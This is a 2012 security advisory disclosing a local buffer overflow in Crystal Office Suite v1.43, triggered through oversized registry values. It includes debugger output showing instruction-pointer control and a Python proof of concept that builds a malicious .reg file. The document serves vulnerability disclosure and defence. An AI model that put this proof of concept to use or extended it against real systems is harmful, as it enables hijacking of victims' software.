Get in touch

Crystal Office Suite v1.43 - Buffer Overflow Vulnerability

Apr 12, 2012 · By Julien Ahrens

ADVISORY INFORMATION

  • Product: Office Suite, CellPro, ChartPro, ClipPlus & NotePro v1.43, 1.23, 1.23, 1.43 & 3.88
  • Vendor URL: http://www.crystaloffice.com
  • Exploitation Technique: Local
  • Severity: High
  • Status: Published
  • VL-ID: 489

CREDITS

Vulnerability Research Laboratory Team - Julien Ahrens (MrTuxracer)

VERSIONS AFFECTED

Cristal Office Systems Product: Office Suite, CellPro, ChartPro, ClipPlus & NotePro v1.43, 1.23, 1.23, 1.43 & 3.88

INTRODUCTION

Crystal Office is the essential office suite ideal for home and business users, delivering more tools that make your work go faster and your life go easier. Find all the essential office software to complete routine tasks faster and with better results. Create and edit text and graphics in letters, reports, documents and Web pages. Perform calculation and manage lists in spreadsheets. Keep track of appointments and tasks. Open, edit and save Microsoft® Office documents.

Whats Included:

• NotePro - feature-packed easy to use word processor. Create polished documents of any length or type, including reports, letters, resumes and brochures. Manage standard text files, Rich Text Format, Word, and HTML.

• DayMate - a versatile intuitive day planner. Use DayMate to create and schedule reminders that can pop up messages, start applications or open documents, check for new e-mail, dial phone numbers, send messages, and open a specified Web sites.

• CellPro - a powerful and easy-to-use spreadsheet application. Use CellPro to create budgets, invoices, receipts and expense reports. Organize, analyze and manage important data and financial information. Open and save Microsoft Excel files.

• ChartPro - a project management software application that is used to create and display projects using a Work Breakdown Structure (WBS) chart. A WBS chart displays the structure of a project showing how a project is organized into summary and detail levels. Using a WBS chart is a more intuitive approach to planning and displaying a project.

• Clip Plus - the award-winning Windows Clipboard enhancer. It works alongside the regular clipboard and automatically grabs and saves text, images, and objects as they are copied to the clipboard - making them available for saving, reuse, and printing.

(Copy of the Vendor Homepage: http://www.crystaloffice.com )

VULNERABILITY DETAILS

A Vulnerability Laboratory Researcher discovered a Local Buffer Overflow vulnerability on Crystal Office Suite v1.43.

A Buffer Overflow vulnerability is detected on Crystal Office Suite v1.43 (current version). Vulnerable are all included programs: CellPro, ChartPro, ClipPlus, NotePro.

The vulnerability is located in each of the program executeables. An oversized string on the registry values Recent1, Recent2 etc. within the keys:

[HKEY_CURRENT_USER/Software/Crystal Office/CellPro] [HKEY_CURRENT_USER/Software/Crystal Office/ChartPro] [HKEY_CURRENT_USER/Software/Crystal Office/ClipPlus] [HKEY_CURRENT_USER/Software/Crystal Office/NotePro]

Results in a local buffer overflow. The value is read while opening the file menu. An attacker needs to manipulate the registry value and has to trick the victim to hover over the ReOpen menu item within the File menu.

— Debug Logs —

# Registers:
EAX 00000000
ECX 42424242
EDX 7C9132BC ntdll.7C9132BC
EBX 00000000
ESP 0012E4E8
EBP 0012E508
ESI 00000000
EDI 00000000
EIP 42424242

# Stack:
0012E4D8   7C929F68  ntdll.7C929F68
0012E4DC   01B40000
0012E4E0   7C91D80A  ntdll.7C91D80A
0012E4E4   7C9601E1  ntdll.7C9601E1
0012E4E8   7C9132A8  RETURN to ntdll.7C9132A8 <--ESP
0012E4EC   0012E5D0
0012E4F0   0012F900  ASCII  AAAABBBBCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
0012E4F4   0012E5EC
0012E4F8   0012E5A4

# Disassembly:
7C91329D   FF75 0C          PUSH DWORD PTR SS:[EBP+C]
7C9132A0   FF75 08          PUSH DWORD PTR SS:[EBP+8]
7C9132A3   8B4D 18          MOV ECX,DWORD PTR SS:[EBP+18]
7C9132A6   FFD1             CALL ECX
7C9132A8   64:8B25 00000000 MOV ESP,DWORD PTR FS:[0]
7C9132AF   64:8F05 00000000 POP DWORD PTR FS:[0]
7C9132B6   8BE5             MOV ESP,EBP
7C9132B8   5D               POP EBP
7C9132B9   C2 1400          RETN 14
7C9132BC   8B4C24 04        MOV ECX,DWORD PTR SS:[ESP+4]

# Dump:
0012F8E8  41 41 41 41 41 41 41 41  AAAAAAAA
0012F8F0  41 41 41 41 41 41 41 41  AAAAAAAA
0012F8F8  41 41 41 41 41 41 41 41  AAAAAAAA
0012F900  41 41 41 41 42 42 42 42  AAAABBBB
0012F908  43 43 43 43 43 43 43 43  CCCCCCCC
0012F910  43 43 43 43 43 43 43 43  CCCCCCCC
0012F918  43 43 43 43 43 43 43 43  CCCCCCCC

Picture(s): ../1.png

The security risk of the local buffer overflow vulnerability is estimated as high.

PROOF OF CONCEPT

The vulnerability can be exploited by local attackers or local low privileged system accounts. For demonstration or reproduce …

#!/usr/bin/python

# Exploit:     Crystal Office Suite v1.43 Local Buffer Overflow Vulnerability
# Version:       1.43
# Software Link: http://www.crystaloffice.com
# Notes:         Vulnerable: CellPro, ChartPro, ClipPlus, NotePro
# Howto:         Import Reg -> Start App -> Move Mouse over "File" - Menuitem "ReOpen"

file="poc.reg"

junk1="\x41" * 4124
boom="\x42\x42\x42\x42"
junk2="\x43" * 100

poc="Windows Registry Editor Version 5.00\n\n"
poc=poc + "[HKEY_CURRENT_USER\Software\Crystal Office\CellPro]\n"
poc=poc + "\"Recent1\"=\"" + junk1 + boom + junk2 + "\""

try:
    print "[*] Creating exploit file...\n";
    writeFile = open (file, "w")
    writeFile.write( poc )
    writeFile.close()
    print "[*] File successfully created!";
except:
    print "[!] Error while creating file!";

SOLUTION

Patch will be provided with the next service update on www.crystaloffice.com

REPORT TIMELINE

  • 2012-04-02: Vendor Notification 1
  • 2012-04-08: Vendor Notification 2
  • 2012-04-09: Vendor Response/Feedback
  • 2012-04-12: Public or Non-Public Disclosure

REFERENCES